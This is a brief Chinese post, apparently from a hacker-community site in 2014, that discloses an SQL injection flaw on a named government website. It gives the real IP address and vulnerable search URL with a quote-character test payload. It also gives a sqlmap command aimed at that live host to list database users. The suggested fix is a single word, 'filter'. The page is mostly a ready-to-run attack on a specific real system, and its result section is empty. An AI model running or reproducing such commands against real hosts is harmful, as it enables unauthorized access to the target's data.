工业和信息化部某站SQL注入漏洞下载

来源:黑吧安全网 浏览:649次 时间:2014-07-16
做网站找雨过天晴工作室

工业和信息化部某站SQL注入漏洞

http://219.239.97.51/chinacc/search2.asp?ClassID=&Field=&Keyword=1%27%22&page=2





sqlmap 跑一下:

 

sqlmap -u "http://219.239.97.51:80/chinacc/search2.asp?ClassID=&Field=&Keyword=1&page=2" --users

dbs:users:



 

修复方案:

过滤